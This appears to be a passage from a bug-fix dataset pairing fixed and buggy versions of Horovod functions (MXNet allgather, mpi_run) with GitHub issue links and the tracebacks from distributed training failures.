Tue Oct 13 10:54:25 2020[0]<stderr>:[10/13/2020 10:54:25 - INFO - __main__ - start running validation...
Tue Oct 13 10:54:25 2020[0]<stderr>: 0%| | 0/1327 [00:00<?, ?it/s]
Tue Oct 13 10:55:56 2020[0]<stderr>:
Exception in thread Thread-17:derr>: 65%|██████▌ | 866/1327 [01:17<00:47, 9.80it/s]
Traceback (most recent call last):
File "/data/anaconda3/envs/vcr/lib/python3.6/threading.py", line 916, in _bootstrap_inner
self.run()
File "/data/anaconda3/envs/vcr/lib/python3.6/threading.py", line 864, in run
self._target(*self._args, **self._kwargs)
File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/runner/common/util/safe_shell_exec.py", line 104, in forward_stream
text = text.decode('utf-8')
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xe2 in position 999: unexpected end of data
Tue Oct 13 10:58:56 2020[3]<stderr>:[2020-10-13 10:58:56.365049: E /dockerdata/app/tmp/pip-install-998q9kn4/horovod/horovod/common/operations.cc:525] Horovod background loop uncaught exception: [/dockerdata/app/tmp/pip-install-998q9kn4/horovod/third_party/compatible_gloo/gloo/transport/tcp/unbound_buffer.cc:84] Timed out waiting 30000ms for recv operation to complete
Tue Oct 13 10:58:56 2020[2]<stderr>:[2020-10-13 10:58:56.366492: E /dockerdata/app/tmp/pip-install-998q9kn4/horovod/horovod/common/operations.cc:525] Horovod background loop uncaught exception: [/dockerdata/app/tmp/pip-install-998q9kn4/horovod/third_party/compatible_gloo/gloo/transport/tcp/unbound_buffer.cc:84] Timed out waiting 30000ms for recv operation to complete
Tue Oct 13 10:58:56 2020[1]<stderr>:[2020-10-13 10:58:56.366674: E /dockerdata/app/tmp/pip-install-998q9kn4/horovod/horovod/common/operations.cc:525] Horovod background loop uncaught exception: [/dockerdata/app/tmp/pip-install-998q9kn4/horovod/third_party/compatible_gloo/gloo/transport/tcp/unbound_buffer.cc:136] Timed out waiting 30000ms for send operation to complete
Tue Oct 13 10:58:56 2020[3]<stderr>:Traceback (most recent call last):
Tue Oct 13 10:58:56 2020[1]<stderr>:Traceback (most recent call last):
Tue Oct 13 10:58:56 2020[3]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 622, in synchronize
Tue Oct 13 10:58:56 2020[2]<stderr>:Traceback (most recent call last):
Tue Oct 13 10:58:56 2020[3]<stderr>: mpi_lib.horovod_torch_wait_and_clear(handle)
Tue Oct 13 10:58:56 2020[2]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 622, in synchronize
Tue Oct 13 10:58:56 2020[3]<stderr>:RuntimeError: Horovod has been shut down. This was caused by an exception on one of the ranks or an attempt to allreduce, allgather or broadcast a tensor after one of the ranks finished execution. If the shutdown was caused by an exception, you should see the exception in the log before the first shutdown message.
Tue Oct 13 10:58:56 2020[1]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 622, in synchronize
Tue Oct 13 10:58:56 2020[3]<stderr>:
Tue Oct 13 10:58:56 2020[1]<stderr>: mpi_lib.horovod_torch_wait_and_clear(handle)
Tue Oct 13 10:58:56 2020[2]<stderr>: mpi_lib.horovod_torch_wait_and_clear(handle)
Tue Oct 13 10:58:57 2020[3]<stderr>:During handling of the above exception, another exception occurred:
Tue Oct 13 10:58:57 2020[2]<stderr>:RuntimeError: Horovod has been shut down. This was caused by an exception on one of the ranks or an attempt to allreduce, allgather or broadcast a tensor after one of the ranks finished execution. If the shutdown was caused by an exception, you should see the exception in the log before the first shutdown message.
Tue Oct 13 10:58:57 2020[1]<stderr>:RuntimeError: Horovod has been shut down. This was caused by an exception on one of the ranks or an attempt to allreduce, allgather or broadcast a tensor after one of the ranks finished execution. If the shutdown was caused by an exception, you should see the exception in the log before the first shutdown message.
Tue Oct 13 10:58:57 2020[3]<stderr>:
Tue Oct 13 10:58:57 2020[1]<stderr>:
Tue Oct 13 10:58:57 2020[2]<stderr>:
Tue Oct 13 10:58:57 2020[3]<stderr>:Traceback (most recent call last):
Tue Oct 13 10:58:57 2020[2]<stderr>:During handling of the above exception, another exception occurred:
Tue Oct 13 10:58:57 2020[1]<stderr>:During handling of the above exception, another exception occurred:
Tue Oct 13 10:58:57 2020[3]<stderr>: File "train_vcr.py", line 332, in <module>
Tue Oct 13 10:58:57 2020[1]<stderr>:
Tue Oct 13 10:58:57 2020[3]<stderr>: main(parse_cmd_args(TrainingOpts))
Tue Oct 13 10:58:57 2020[1]<stderr>:Traceback (most recent call last):
Tue Oct 13 10:58:57 2020[3]<stderr>: File "train_vcr.py", line 260, in main
Tue Oct 13 10:58:57 2020[1]<stderr>: File "train_vcr.py", line 332, in <module>
Tue Oct 13 10:58:57 2020[3]<stderr>: val_log = validate(model, val_dataloader)
Tue Oct 13 10:58:57 2020[1]<stderr>: main(parse_cmd_args(TrainingOpts))
Tue Oct 13 10:58:57 2020[3]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/torch/autograd/grad_mode.py", line 49, in decorate_no_grad
Tue Oct 13 10:58:57 2020[1]<stderr>: File "train_vcr.py", line 260, in main
Tue Oct 13 10:58:57 2020[3]<stderr>: return func(*args, **kwargs)
Tue Oct 13 10:58:57 2020[1]<stderr>: val_log = validate(model, val_dataloader)
Tue Oct 13 10:58:58 2020[3]<stderr>: File "train_vcr.py", line 310, in validate
Tue Oct 13 10:58:58 2020[1]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/torch/autograd/grad_mode.py", line 49, in decorate_no_grad
Tue Oct 13 10:58:57 2020[2]<stderr>:
Tue Oct 13 10:58:58 2020[3]<stderr>: qa_loss = sum(all_gather_list(qa_loss))
Tue Oct 13 10:58:58 2020[1]<stderr>: return func(*args, **kwargs)
Tue Oct 13 10:58:58 2020[2]<stderr>:Traceback (most recent call last):
Tue Oct 13 10:58:58 2020[1]<stderr>: File "train_vcr.py", line 310, in validate
Tue Oct 13 10:58:58 2020[2]<stderr>: File "train_vcr.py", line 332, in <module>
Tue Oct 13 10:58:58 2020[3]<stderr>: File "/data/cdp_algo_ceph_ssd/users/haoyanhuo/vcr/utils/distributed.py", line 233, in all_gather_list
Tue Oct 13 10:58:58 2020[2]<stderr>: main(parse_cmd_args(TrainingOpts))
Tue Oct 13 10:58:58 2020[3]<stderr>: max_size = hvd.allgather(torch.tensor([enc_size]).cuda()).max().item()
Tue Oct 13 10:58:58 2020[1]<stderr>: qa_loss = sum(all_gather_list(qa_loss))
Tue Oct 13 10:58:58 2020[2]<stderr>: File "train_vcr.py", line 260, in main
Tue Oct 13 10:58:58 2020[3]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 365, in allgather
Tue Oct 13 10:58:58 2020[2]<stderr>: val_log = validate(model, val_dataloader)
Tue Oct 13 10:58:58 2020[3]<stderr>: return HorovodAllgather.apply(tensor, name)
Tue Oct 13 10:58:58 2020[1]<stderr>: File "/data/cdp_algo_ceph_ssd/users/haoyanhuo/vcr/utils/distributed.py", line 233, in all_gather_list
Tue Oct 13 10:58:58 2020[2]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/torch/autograd/grad_mode.py", line 49, in decorate_no_grad
Tue Oct 13 10:58:58 2020[1]<stderr>: max_size = hvd.allgather(torch.tensor([enc_size]).cuda()).max().item()
Tue Oct 13 10:58:58 2020[3]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 328, in forward
Tue Oct 13 10:58:59 2020[2]<stderr>: return func(*args, **kwargs)
Tue Oct 13 10:58:59 2020[3]<stderr>: return synchronize(handle)
Tue Oct 13 10:58:59 2020[2]<stderr>: File "train_vcr.py", line 310, in validate
Tue Oct 13 10:58:59 2020[3]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 626, in synchronize
Tue Oct 13 10:58:59 2020[2]<stderr>: qa_loss = sum(all_gather_list(qa_loss))
Tue Oct 13 10:58:59 2020[3]<stderr>: raise HorovodInternalError(e)
Tue Oct 13 10:58:59 2020[2]<stderr>: File "/data/cdp_algo_ceph_ssd/users/haoyanhuo/vcr/utils/distributed.py", line 233, in all_gather_list
Tue Oct 13 10:58:59 2020[3]<stderr>:horovod.common.exceptions.HorovodInternalError: Horovod has been shut down. This was causedby an exception on one of the ranks or an attempt to allreduce, allgather or broadcast a tensor after one of the ranks finishedexecution. If the shutdown was caused by an exception, you should see the exception in the log before the first shutdown message.
Tue Oct 13 10:58:59 2020[1]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 365, in allgather
Tue Oct 13 10:58:59 2020[2]<stderr>: max_size = hvd.allgather(torch.tensor([enc_size]).cuda()).max().item()
Tue Oct 13 10:58:59 2020[2]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 365, in allgather
Tue Oct 13 10:58:59 2020[1]<stderr>: return HorovodAllgather.apply(tensor, name)
Tue Oct 13 10:58:59 2020[1]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 328, in forward
Tue Oct 13 10:58:59 2020[2]<stderr>: return HorovodAllgather.apply(tensor, name)
Tue Oct 13 10:58:59 2020[2]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 328, in forward
Tue Oct 13 10:58:59 2020[1]<stderr>: return synchronize(handle)
Tue Oct 13 10:58:59 2020[1]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 626, in synchronize
Tue Oct 13 10:58:59 2020[2]<stderr>: return synchronize(handle)
Tue Oct 13 10:58:59 2020[1]<stderr>: raise HorovodInternalError(e)
Tue Oct 13 10:59:00 2020[2]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 626, in synchronize
Tue Oct 13 10:59:00 2020[1]<stderr>:horovod.common.exceptions.HorovodInternalError: Horovod has been shut down. This was causedby an exception on one of the ranks or an attempt to allreduce, allgather or broadcast a tensor after one of the ranks finishedexecution. If the shutdown was caused by an exception, you should see the exception in the log before the first shutdown message.
Tue Oct 13 10:59:00 2020[2]<stderr>: raise HorovodInternalError(e)
Tue Oct 13 10:59:00 2020[2]<stderr>:horovod.common.exceptions.HorovodInternalError: Horovod has been shut down. This was causedby an exception on one of the ranks or an attempt to allreduce, allgather or broadcast a tensor after one of the ranks finishedexecution. If the shutdown was caused by an exception, you should see the exception in the log before the first shutdown message.
|
UnicodeDecodeError
|
def allgather(tensor, name=None, priority=0):
"""
A function that concatenates the input tensor with the same input tensor on
all other Horovod processes. The input tensor is not modified.
The concatenation is done on the first dimension, so the input tensors on
the different processes must have the same rank and shape, except for the
first dimension, which is allowed to be different.
This acts as a thin wrapper around an autograd function. If your input
tensor requires gradients, then callings this function will allow gradients
to be computed and backpropagated.
Arguments:
tensor: A tensor to allgather.
name: A name of the allgather operation.
priority: The priority of this operation. Higher priority operations
are likely to be executed before other operations.
Returns:
A tensor of the same type as `tensor`, concatenated on dimension zero
across all processes. The shape is identical to the input shape, except
for the first dimension, which may be greater and is the sum of all
first dimensions of the tensors in different Horovod processes.
"""
assert isinstance(tensor, mx.nd.NDArray)
# Size of output is unknown, create output array that
# will be resized during Horovod operation
output = mx.nd.empty(shape=[1], ctx=tensor.context, dtype=tensor.dtype)
c_in = tensor.handle
c_out = output.handle
if isinstance(name, string_types):
check_call(
MPI_MXNET_LIB_CTYPES.horovod_mxnet_allgather_async(
c_in, c_out, c_str(name), ctypes.c_int(priority)
)
)
else:
check_call(
MPI_MXNET_LIB_CTYPES.horovod_mxnet_allgather_async(
c_in, c_out, name, ctypes.c_int(priority)
)
)
# Need to block here so changes to output tensor are visible
output.wait_to_read()
return output
|
def allgather(tensor, name=None, priority=0):
"""
A function that concatenates the input tensor with the same input tensor on
all other Horovod processes. The input tensor is not modified.
The concatenation is done on the first dimension, so the input tensors on
the different processes must have the same rank and shape, except for the
first dimension, which is allowed to be different.
This acts as a thin wrapper around an autograd function. If your input
tensor requires gradients, then callings this function will allow gradients
to be computed and backpropagated.
Arguments:
tensor: A tensor to allgather.
name: A name of the allgather operation.
priority: The priority of this operation. Higher priority operations
are likely to be executed before other operations.
Returns:
A tensor of the same type as `tensor`, concatenated on dimension zero
across all processes. The shape is identical to the input shape, except
for the first dimension, which may be greater and is the sum of all
first dimensions of the tensors in different Horovod processes.
"""
assert isinstance(tensor, mx.nd.NDArray)
output = mx.nd.zeros(shape=tensor.shape, ctx=tensor.context, dtype=tensor.dtype)
c_in = tensor.handle
c_out = output.handle
if isinstance(name, string_types):
check_call(
MPI_MXNET_LIB_CTYPES.horovod_mxnet_allgather_async(
c_in, c_out, c_str(name), ctypes.c_int(priority)
)
)
else:
check_call(
MPI_MXNET_LIB_CTYPES.horovod_mxnet_allgather_async(
c_in, c_out, name, ctypes.c_int(priority)
)
)
return output
|
https://github.com/horovod/horovod/issues/1669
|
(before) a.shape = (10, 100, 100)
(before) a[0]=
[[0.6686509 0.17409194 0.3850025 ... 0.43011498 0.0661214 0.2502998 ]
[0.7005292 0.19000232 0.6673837 ... 0.27718288 0.16084558 0.223108 ]
[0.96042585 0.81086403 0.54152083 ... 0.5650488 0.5196334 0.6767488 ]
...
[0.96879214 0.9387428 0.04036242 ... 0.13176239 0.3436321 0.47154343]
[0.8069018 0.91234195 0.01141495 ... 0.35816687 0.57390726 0.68393874]
[0.72049534 0.67948174 0.44702923 ... 0.87448525 0.63809574 0.7006303 ]]
<NDArray 100x100 @gpu(0)>
(after) a.shape = (10, 100, 100)
(before) a.shape = (10, 100, 100)
(before) a[0]=
[[0.7685592 0.10232276 0.8685353 ... 0.93769354 0.62144864 0.21535844]
[0.85973674 0.3420865 0.6202223 ... 0.5464046 0.41442537 0.32170743]
[0.11786121 0.23281038 0.95843846 ... 0.17739207 0.5901362 0.28355032]
...
[0.70749086 0.61171615 0.37854642 ... 0.3485002 0.29636437 0.7359518 ]
[0.4345038 0.90834665 0.5242443 ... 0.0793817 0.40161872 0.6579807 ]
[0.8531954 0.18177992 0.7053579 ... 0.5257004 0.24457276 0.74836564]]
<NDArray 100x100 @gpu(1)>
(after) a.shape = (10, 100, 100)
Traceback (most recent call last):
File "all_gather_bug.py", line 29, in <module>
print("(after) a[0]={}".format(a[0]))
File "/opt/mxnet/python/mxnet/ndarray/ndarray.py", line 194, in __repr__
return '\n%s\n<%s %s @%s>' % (str(self.asnumpy()),
File "/opt/mxnet/python/mxnet/ndarray/ndarray.py", line 1996, in asnumpy
ctypes.c_size_t(data.size)))
File "/opt/mxnet/python/mxnet/base.py", line 252, in check_call
raise MXNetError(py_str(_LIB.MXGetLastError()))
mxnet.base.MXNetError: MPI_Allgatherv failed, see MPI output for details.
Traceback (most recent call last):
File "all_gather_bug.py", line 29, in <module>
print("(after) a[0]={}".format(a[0]))
File "/opt/mxnet/python/mxnet/ndarray/ndarray.py", line 194, in __repr__
return '\n%s\n<%s %s @%s>' % (str(self.asnumpy()),
File "/opt/mxnet/python/mxnet/ndarray/ndarray.py", line 1996, in asnumpy
ctypes.c_size_t(data.size)))
File "/opt/mxnet/python/mxnet/base.py", line 252, in check_call
raise MXNetError(py_str(_LIB.MXGetLastError()))
mxnet.base.MXNetError: MPI_Allgatherv failed, see MPI output for details.
--------------------------------------------------------------------------
Primary job terminated normally, but 1 process returned
a non-zero exit code. Per user-direction, the job has been aborted.
--------------------------------------------------------------------------
--------------------------------------------------------------------------
mpiexec detected that one or more processes exited with non-zero status, thus causing
the job to be terminated. The first process to do so was:
Process name: [[59002,1],1]
Exit code: 1
|
mxnet.base.MXNetError
|
def mpi_run(settings, nics, env, command, stdout=None, stderr=None):
"""
Runs mpi_run.
Args:
settings: Settings for running MPI.
Note: settings.num_proc and settings.hosts must not be None.
nics: Interfaces to include by MPI.
env: Environment dictionary to use for running command.
command: Command and arguments to run as a list of string.
stdout: Stdout of the mpi process.
Only used when settings.run_func_mode is True.
stderr: Stderr of the mpi process.
Only used when settings.run_func_mode is True.
"""
if env is not None and not isinstance(env, dict):
raise Exception(
"env argument must be a dict, not {type}: {env}".format(
type=type(env), env=env
)
)
mpi_impl_flags, impl_binding_args = _get_mpi_implementation_flags(
settings.tcp_flag, env=env
)
if mpi_impl_flags is None:
raise Exception(_MPI_NOT_FOUND_ERROR_MSG)
ssh_port_arg = (
'-mca plm_rsh_args "-p {ssh_port}"'.format(ssh_port=settings.ssh_port)
if settings.ssh_port
else ""
)
# if user does not specify any hosts, mpirun by default uses local host.
# There is no need to specify localhost.
hosts_arg = "-H {hosts}".format(hosts=settings.hosts)
tcp_intf_arg = (
"-mca btl_tcp_if_include {nics}".format(nics=",".join(nics)) if nics else ""
)
nccl_socket_intf_arg = (
"-x NCCL_SOCKET_IFNAME={nics}".format(nics=",".join(nics)) if nics else ""
)
# On large cluster runs (e.g. Summit), we need extra settings to work around OpenMPI issues
if settings.num_hosts and settings.num_hosts >= _LARGE_CLUSTER_THRESHOLD:
mpi_impl_flags.append("-mca plm_rsh_no_tree_spawn true")
mpi_impl_flags.append(
"-mca plm_rsh_num_concurrent {}".format(settings.num_hosts)
)
binding_args = (
settings.binding_args if settings.binding_args else " ".join(impl_binding_args)
)
# Pass all the env variables to the mpirun command.
mpirun_command = (
"mpirun --allow-run-as-root --tag-output "
"-np {num_proc} {hosts_arg} "
"{binding_args} "
"{mpi_args} "
"{ssh_port_arg} "
"{tcp_intf_arg} "
"{nccl_socket_intf_arg} "
"{output_filename_arg} "
"{env} {extra_mpi_args} {command}".format( # expect a lot of environment variables
num_proc=settings.num_proc,
hosts_arg=hosts_arg,
binding_args=binding_args,
mpi_args=" ".join(mpi_impl_flags),
tcp_intf_arg=tcp_intf_arg,
nccl_socket_intf_arg=nccl_socket_intf_arg,
ssh_port_arg=ssh_port_arg,
output_filename_arg="--output-filename " + settings.output_filename
if settings.output_filename
else "",
env=" ".join(
"-x %s" % key
for key in sorted(env.keys())
if env_util.is_exportable(key)
),
extra_mpi_args=settings.extra_mpi_args if settings.extra_mpi_args else "",
command=" ".join(quote(par) for par in command),
)
)
if settings.verbose >= 2:
print(mpirun_command)
# we need the driver's PATH and PYTHONPATH in env to run mpirun,
# env for mpirun is different to env encoded in mpirun_command
for var in ["PATH", "PYTHONPATH"]:
if var not in env and var in os.environ:
# copy env so we do not leak env modifications
env = copy.copy(env)
# copy var over from os.environ
env[var] = os.environ[var]
# Execute the mpirun command.
if settings.run_func_mode:
exit_code = safe_shell_exec.execute(
mpirun_command, env=env, stdout=stdout, stderr=stderr
)
if exit_code != 0:
raise RuntimeError(
"mpirun failed with exit code {exit_code}".format(exit_code=exit_code)
)
else:
os.execve("/bin/sh", ["/bin/sh", "-c", mpirun_command], env)
|
def mpi_run(settings, nics, env, command, stdout=None, stderr=None):
"""
Runs mpi_run.
Args:
settings: Settings for running MPI.
Note: settings.num_proc and settings.hosts must not be None.
nics: Interfaces to include by MPI.
env: Environment dictionary to use for running command.
command: Command and arguments to run as a list of string.
stdout: Stdout of the mpi process.
Only used when settings.run_func_mode is True.
stderr: Stderr of the mpi process.
Only used when settings.run_func_mode is True.
"""
if env is not None and not isinstance(env, dict):
raise Exception(
"env argument must be a dict, not {type}: {env}".format(
type=type(env), env=env
)
)
mpi_impl_flags, impl_binding_args = _get_mpi_implementation_flags(
settings.tcp_flag, env=env
)
if mpi_impl_flags is None:
raise Exception(_MPI_NOT_FOUND_ERROR_MSG)
ssh_port_arg = (
'-mca plm_rsh_args "-p {ssh_port}"'.format(ssh_port=settings.ssh_port)
if settings.ssh_port
else ""
)
# if user does not specify any hosts, mpirun by default uses local host.
# There is no need to specify localhost.
hosts_arg = "-H {hosts}".format(hosts=settings.hosts)
tcp_intf_arg = (
"-mca btl_tcp_if_include {nics}".format(nics=",".join(nics)) if nics else ""
)
nccl_socket_intf_arg = (
"-x NCCL_SOCKET_IFNAME={nics}".format(nics=",".join(nics)) if nics else ""
)
# On large cluster runs (e.g. Summit), we need extra settings to work around OpenMPI issues
if settings.num_hosts and settings.num_hosts >= _LARGE_CLUSTER_THRESHOLD:
mpi_impl_flags.append("-mca plm_rsh_no_tree_spawn true")
mpi_impl_flags.append(
"-mca plm_rsh_num_concurrent {}".format(settings.num_hosts)
)
binding_args = (
settings.binding_args if settings.binding_args else " ".join(impl_binding_args)
)
# Pass all the env variables to the mpirun command.
mpirun_command = (
"mpirun --allow-run-as-root --tag-output "
"-np {num_proc} {hosts_arg} "
"{binding_args} "
"{mpi_args} "
"{ssh_port_arg} "
"{tcp_intf_arg} "
"{nccl_socket_intf_arg} "
"{output_filename_arg} "
"{env} {extra_mpi_args} {command}".format( # expect a lot of environment variables
num_proc=settings.num_proc,
hosts_arg=hosts_arg,
binding_args=binding_args,
mpi_args=" ".join(mpi_impl_flags),
tcp_intf_arg=tcp_intf_arg,
nccl_socket_intf_arg=nccl_socket_intf_arg,
ssh_port_arg=ssh_port_arg,
output_filename_arg="--output-filename " + settings.output_filename
if settings.output_filename
else "",
env=" ".join(
"-x %s" % key
for key in sorted(env.keys())
if env_util.is_exportable(key)
),
extra_mpi_args=settings.extra_mpi_args if settings.extra_mpi_args else "",
command=" ".join(quote(par) for par in command),
)
)
if settings.verbose >= 2:
print(mpirun_command)
# we need the driver's PATH in env to run mpirun,
# env for mpirun is different to env encoded in mpirun_command
if "PATH" not in env and "PATH" in os.environ:
env = copy.copy(env) # copy env so we do not leak env modifications
env["PATH"] = os.environ["PATH"]
# Execute the mpirun command.
if settings.run_func_mode:
exit_code = safe_shell_exec.execute(
mpirun_command, env=env, stdout=stdout, stderr=stderr
)
if exit_code != 0:
raise RuntimeError(
"mpirun failed with exit code {exit_code}".format(exit_code=exit_code)
)
else:
os.execve("/bin/sh", ["/bin/sh", "-c", mpirun_command], env)
|
https://github.com/horovod/horovod/issues/2033
|
File "/usr/lib/python3.7/runpy.py", line 183, in _run_module_as_main
mod_name, mod_spec, code = _get_module_details(mod_name, _Error)
File "/usr/lib/python3.7/runpy.py", line 109, in _get_module_details
__import__(pkg_name)
File "/home/weichen.xu/.local/lib/python3.7/site-packages/horovod/spark/__init__.py", line 18, in <module>
from .runner import run
File "/home/weichen.xu/.local/lib/python3.7/site-packages/horovod/spark/runner.py", line 20, in <module>
import pyspark
ModuleNotFoundError: No module named 'pyspark'
--------------------------------------------------------------------------
ORTE was unable to reliably start one or more daemons.
This usually is caused by:
...
--------------------------------------------------------------------------
Exception in thread Thread-3:
Traceback (most recent call last):
File "/usr/lib/python3.7/threading.py", line 926, in _bootstrap_inner
self.run()
File "/usr/lib/python3.7/threading.py", line 870, in run
self._target(*self._args, **self._kwargs)
File "/home/weichen.xu/.local/lib/python3.7/site-packages/horovod/spark/runner.py", line 100, in run_spark
result = procs.mapPartitionsWithIndex(_make_mapper(driver.addresses(), settings, use_gloo)).collect()
File "/home/weichen.xu/spark-3.0.0-preview2-bin-hadoop2.7/python/pyspark/rdd.py", line 889, in collect
sock_info = self.ctx._jvm.PythonRDD.collectAndServe(self._jrdd.rdd())
File "/home/weichen.xu/spark-3.0.0-preview2-bin-hadoop2.7/python/lib/py4j-0.10.8.1-src.zip/py4j/java_gateway.py", line 1286, in __call__
answer, self.gateway_client, self.target_id, self.name)
File "/home/weichen.xu/spark-3.0.0-preview2-bin-hadoop2.7/python/pyspark/sql/utils.py", line 98, in deco
return f(*a, **kw)
File "/home/weichen.xu/spark-3.0.0-preview2-bin-hadoop2.7/python/lib/py4j-0.10.8.1-src.zip/py4j/protocol.py", line 328, in get_return_value
format(target_id, ".", name), value)
py4j.protocol.Py4JJavaError: An error occurred while calling z:org.apache.spark.api.python.PythonRDD.collectAndServe.
: org.apache.spark.SparkException: Job 0 cancelled part of cancelled job group horovod.spark.run.0
at org.apache.spark.scheduler.DAGScheduler.failJobAndIndependentStages(DAGScheduler.scala:1989)
at org.apache.spark.scheduler.DAGScheduler.handleJobCancellation(DAGScheduler.scala:1924)
at org.apache.spark.scheduler.DAGScheduler.$anonfun$handleJobGroupCancelled$4(DAGScheduler.scala:937)
at scala.runtime.java8.JFunction1$mcVI$sp.apply(JFunction1$mcVI$sp.java:23)
at scala.collection.mutable.HashSet.foreach(HashSet.scala:79)
at org.apache.spark.scheduler.DAGScheduler.handleJobGroupCancelled(DAGScheduler.scala:936)
at org.apache.spark.scheduler.DAGSchedulerEventProcessLoop.doOnReceive(DAGScheduler.scala:2175)
at org.apache.spark.scheduler.DAGSchedulerEventProcessLoop.onReceive(DAGScheduler.scala:2155)
at org.apache.spark.scheduler.DAGSchedulerEventProcessLoop.onReceive(DAGScheduler.scala:2144)
at org.apache.spark.util.EventLoop$$anon$1.run(EventLoop.scala:49)
at org.apache.spark.scheduler.DAGScheduler.runJob(DAGScheduler.scala:758)
at org.apache.spark.SparkContext.runJob(SparkContext.scala:2116)
at org.apache.spark.SparkContext.runJob(SparkContext.scala:2137)
at org.apache.spark.SparkContext.runJob(SparkContext.scala:2156)
at org.apache.spark.SparkContext.runJob(SparkContext.scala:2181)
at org.apache.spark.rdd.RDD.$anonfun$collect$1(RDD.scala:1004)
at org.apache.spark.rdd.RDDOperationScope$.withScope(RDDOperationScope.scala:151)
at org.apache.spark.rdd.RDDOperationScope$.withScope(RDDOperationScope.scala:112)
at org.apache.spark.rdd.RDD.withScope(RDD.scala:388)
at org.apache.spark.rdd.RDD.collect(RDD.scala:1003)
at org.apache.spark.api.python.PythonRDD$.collectAndServe(PythonRDD.scala:168)
at org.apache.spark.api.python.PythonRDD.collectAndServe(PythonRDD.scala)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at py4j.reflection.MethodInvoker.invoke(MethodInvoker.java:244)
at py4j.reflection.ReflectionEngine.invoke(ReflectionEngine.java:357)
at py4j.Gateway.invoke(Gateway.java:282)
at py4j.commands.AbstractCommand.invokeMethod(AbstractCommand.java:132)
at py4j.commands.CallCommand.execute(CallCommand.java:79)
at py4j.GatewayConnection.run(GatewayConnection.java:238)
at java.lang.Thread.run(Thread.java:748)
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/home/weichen.xu/.local/lib/python3.7/site-packages/horovod/spark/runner.py", line 227, in run
_launch_job(use_mpi, use_gloo, settings, driver, env, stdout, stderr)
File "/home/weichen.xu/.local/lib/python3.7/site-packages/horovod/spark/runner.py", line 123, in _launch_job
settings.verbose)
File "/home/weichen.xu/.local/lib/python3.7/site-packages/horovod/run/runner.py", line 686, in run_controller
mpi_run()
File "/home/weichen.xu/.local/lib/python3.7/site-packages/horovod/spark/runner.py", line 121, in <lambda>
use_mpi, lambda: mpi_run(settings, nics, driver, env, stdout, stderr),
File "/home/weichen.xu/.local/lib/python3.7/site-packages/horovod/spark/mpi_run.py", line 54, in mpi_run
hr_mpi_run(settings, nics, env, command, stdout=stdout, stderr=stderr)
File "/home/weichen.xu/.local/lib/python3.7/site-packages/horovod/run/mpi_run.py", line 201, in mpi_run
raise RuntimeError("mpirun failed with exit code {exit_code}".format(exit_code=exit_code))
RuntimeError: mpirun failed with exit code 1
20/06/18 05:40:55 WARN PythonRunner: Incomplete task 0.0 in stage 0 (TID 0) interrupted: Attempting to kill Python Worker
20/06/18 05:40:55 WARN PythonRunner: Incomplete task 1.0 in stage 0 (TID 1) interrupted: Attempting to kill Python Worker
20/06/18 05:40:56 WARN TaskSetManager: Lost task 1.0 in stage 0.0 (TID 1, ip-10-20-4-87.us-west-2.compute.internal, executor driver): TaskKilled (Stage cancelled)
20/06/18 05:40:56 WARN TaskSetManager: Lost task 0.0 in stage 0.0 (TID 0, ip-10-20-4-87.us-west-2.compute.internal, executor driver): TaskKilled (Stage cancelled)
|
ModuleNotFoundError
|
def mpi_run(settings, nics, env, command, stdout=None, stderr=None):
"""
Runs mpi_run.
Args:
settings: Settings for running MPI.
Note: settings.num_proc and settings.hosts must not be None.
nics: Interfaces to include by MPI.
env: Environment dictionary to use for running command.
command: Command and arguments to run as a list of string.
stdout: Stdout of the mpi process.
Only used when settings.run_func_mode is True.
stderr: Stderr of the mpi process.
Only used when settings.run_func_mode is True.
"""
if env is not None and not isinstance(env, dict):
raise Exception(
"env argument must be a dict, not {type}: {env}".format(
type=type(env), env=env
)
)
mpi_impl_flags, impl_binding_args = _get_mpi_implementation_flags(
settings.tcp_flag, env=env
)
if mpi_impl_flags is None:
raise Exception(_MPI_NOT_FOUND_ERROR_MSG)
ssh_port_arg = (
'-mca plm_rsh_args "-p {ssh_port}"'.format(ssh_port=settings.ssh_port)
if settings.ssh_port
else ""
)
# if user does not specify any hosts, mpirun by default uses local host.
# There is no need to specify localhost.
hosts_arg = "-H {hosts}".format(hosts=settings.hosts)
tcp_intf_arg = (
"-mca btl_tcp_if_include {nics}".format(nics=",".join(nics)) if nics else ""
)
nccl_socket_intf_arg = (
"-x NCCL_SOCKET_IFNAME={nics}".format(nics=",".join(nics)) if nics else ""
)
# On large cluster runs (e.g. Summit), we need extra settings to work around OpenMPI issues
if settings.num_hosts and settings.num_hosts >= _LARGE_CLUSTER_THRESHOLD:
mpi_impl_flags.append("-mca plm_rsh_no_tree_spawn true")
mpi_impl_flags.append(
"-mca plm_rsh_num_concurrent {}".format(settings.num_hosts)
)
binding_args = (
